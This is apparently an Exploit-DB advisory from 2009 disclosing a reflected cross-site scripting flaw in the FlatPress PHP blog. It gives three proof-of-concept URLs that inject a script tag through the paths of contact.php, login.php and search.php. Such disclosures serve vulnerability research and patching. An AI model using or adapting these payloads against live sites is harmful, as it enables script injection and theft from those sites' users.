Flatpress - Cross-Site Scripting

EDB-ID:

10688




Platform:

PHP

Date:

2009-12-26


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

========================================================================================                  
| # Title    : FlatPress Cross Site Scripting Vulnerability                            |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : powered by FlatPress / http://www.flatpress.org/                        |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://server/flatpress/contact.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
| 2- http://server/flatpress/login.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
| 3- http://server/flatpress/search.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------